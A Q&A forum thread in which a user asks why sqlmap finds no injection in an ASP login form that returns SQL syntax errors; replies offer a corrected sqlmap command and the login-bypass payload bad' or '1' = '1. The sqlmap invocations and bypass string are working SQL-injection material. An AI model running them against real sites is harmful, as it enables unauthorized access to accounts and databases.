# sqlmap login post problem

Tags: sql-injection, sqlmap

I have an asp login form (username & password) that is SQL-injectable when the username is found in the database

For example, if I inserted

```
-username : foo   (foo founded in database)

-password : '.;/;
```

Then the result is:

> Incorrect syntax near ';'. Unclosed quotation mark after the character string ' order by dat desc '.`

Question:  In sqlmap I wrote

```
sqlmap --url="foo.com/login.aspx" --data="username=foo&password=.';.;."
--level=5
```

But the sqlmap result is: `all tested parameters appear to be not injectable.`

What is the wrong with my sqlmap statement?

Comment: you are trying to inject it while injecting? just do this...

sqlmap --url="foo.com/login.aspx" --data="username=foo&password=bar"
--level=5

Answer (score 1):

That you can generate an error doesn't necessarily mean you can exploit it. Did you try something like

```
bad' or '1' = '1
```

Can you bypass the login?

Comment: i have used ,but doesn't work

Comment: Can you share the asp code with us? Maybe the code is not injectable the way you expect it to be.